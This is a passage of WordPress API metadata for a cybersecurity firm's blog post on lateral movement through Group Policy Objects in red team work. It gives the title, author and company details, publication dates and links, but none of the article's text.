"https:\\\/\\\/www.youtube.com\\\/channel\\\/UC0trUZAHNZOUbxYnNdecM4A\"],\"description\":\"soci\u00e9t\u00e9 de consulting, pure player cybers\u00e9curit\u00e9 fran\u00e7ais et europ\u00e9en depuis plus de 30ans, sp\u00e9cialiste dans la s\u00e9curit\u00e9 offensive & audit (pentest\\\/red team), GRC, et services IMSS comme le SOC, CTI et CERT Intrinsec est qualifi\u00e9 PASSI Elev\u00e9, PRIS Elev\u00e9 et PACS par l'ANSSI\",\"email\":\"contact@intrinsec.com\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/www.intrinsec.com\\\/#\\\/schema\\\/person\\\/eba80a0167fdf3502c18343d08948ffa\",\"name\":\"Paul Saladin (P-alu)\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=96&d=retro&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=96&d=retro&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=96&d=retro&r=g\",\"caption\":\"Paul Saladin (P-alu)\"},\"description\":\"Red Team Operator @Intrinsec\",\"sameAs\":[\"https:\\\/\\\/github.com\\\/P-aLu\\\/\"],\"url\":\"https:\\\/\\\/www.intrinsec.com\\\/en\\\/author\\\/paul-saladin\\\/\"}]}<\/script>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Hide the threat - GPO lateral movement - INTRINSEC","description":"Learn how to perform and understand lateral movement though GPO mechanism during pentest and red team assessments.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/","og_locale":"en_US","og_type":"article","og_title":"Hide the threat - GPO lateral movement","og_description":"Learn how to perform and understand lateral mouvement though GPO mechanism during pentest and red team assessments.","og_url":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/","og_site_name":"INTRINSEC","article_published_time":"2025-11-25T13:06:27+00:00","article_modified_time":"2025-11-25T13:06:29+00:00","og_image":[{"width":1014,"height":1010,"url":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/2025-10-21_11-49-36.png","type":"image\/png"}],"author":"Paul Saladin (P-alu)","twitter_card":"summary_large_image","twitter_creator":"@Intrinsec","twitter_site":"@Intrinsec","twitter_misc":{"Written by":"Paul Saladin (P-alu)","Est. reading time":"12 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/#article","isPartOf":{"@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/"},"author":{"name":"Paul Saladin (P-alu)","@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eba80a0167fdf3502c18343d08948ffa"},"headline":"Hide the threat &#8211; GPO lateral movement","datePublished":"2025-11-25T13:06:27+00:00","dateModified":"2025-11-25T13:06:29+00:00","mainEntityOfPage":{"@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/"},"wordCount":1597,"publisher":{"@id":"https:\/\/www.intrinsec.com\/#organization"},"image":{"@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/2025-10-21_11-49-36.png","keywords":["Active Directory","Red Team"],"articleSection":["Recherche et D\u00e9veloppement","Red Teaming","Test d'intrusion"],"inLanguage":"en-US"},{"@type":"WebPage","@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/","url":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/","name":"Hide the threat - GPO lateral movement - INTRINSEC","isPartOf":{"@id":"https:\/\/www.intrinsec.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/#primaryimage"},"image":{"@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/#primaryimage"},"thumbnailUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/2025-10-21_11-49-36.png","datePublished":"2025-11-25T13:06:27+00:00","dateModified":"2025-11-25T13:06:29+00:00","description":"Learn how to perform and understand lateral movement though GPO mechanism during pentest and red team assessments.","breadcrumb":{"@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/"]}]},{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/#primaryimage","url":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/2025-10-21_11-49-36.png","contentUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/10\/2025-10-21_11-49-36.png","width":1014,"height":1010},{"@type":"BreadcrumbList","@id":"https:\/\/www.intrinsec.com\/en\/hide-the-threat-gpo-lateral-movement\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.intrinsec.com\/"},{"@type":"ListItem","position":2,"name":"Hide the threat &#8211; GPO lateral movement"}]},{"@type":"WebSite","@id":"https:\/\/www.intrinsec.com\/#website","url":"https:\/\/www.intrinsec.com\/","name":"INTRINSEC","description":"Our job is to protect yours.","publisher":{"@id":"https:\/\/www.intrinsec.com\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.intrinsec.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/www.intrinsec.com\/#organization","name":"INTRINSEC","alternateName":"ISEC","url":"https:\/\/www.intrinsec.com\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.intrinsec.com\/#\/schema\/logo\/image\/","url":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/02\/libellule.png","contentUrl":"https:\/\/www.intrinsec.com\/wp-content\/uploads\/2025\/02\/libellule.png","width":1322,"height":1322,"caption":"INTRINSEC"},"image":{"@id":"https:\/\/www.intrinsec.com\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/x.com\/Intrinsec","https:\/\/fr.linkedin.com\/company\/intrinsec","https:\/\/www.youtube.com\/channel\/UC0trUZAHNZOUbxYnNdecM4A"],"description":"Intrinsec, a consulting firm and pure-play French and European cybersecurity provider for over 30 years, specializes in offensive security and auditing (penetration testing\/red teams), GRC, and IMSS services such as SOC, CTI, and CERT. Intrinsec is qualified at PASSI High, PRIS High, and PACS levels by ANSSI.","email":"contact@intrinsec.com"},{"@type":"Person","@id":"https:\/\/www.intrinsec.com\/#\/schema\/person\/eba80a0167fdf3502c18343d08948ffa","name":"Paul Saladin (P-alu)","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=96&d=retro&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=96&d=retro&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/e8624d4e647b63bc3801dc8be66bc836c18add9a35d8f555c861854a4ffc1203?s=96&d=retro&r=g","caption":"Paul Saladin (P-alu)"},"description":"Red Team Operator @Intrinsec","sameAs":["https:\/\/github.com\/P-aLu\/"],"url":"https:\/\/www.intrinsec.com\/en\/author\/paul-saladin\/"}]}},"_links":{"self":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/230278","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/users\/19"}],"replies":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/comments?post=230278"}],"version-history":[{"count":24,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/230278\/revisions"}],"predecessor-version":[{"id":230630,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/posts\/230278\/revisions\/230630"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/media\/230350"}],"wp:attachment":[{"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/media?parent=230278"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/categories?post=230278"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.intrinsec.com\/en\/wp-json\/wp\/v2\/tags?post=230278"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}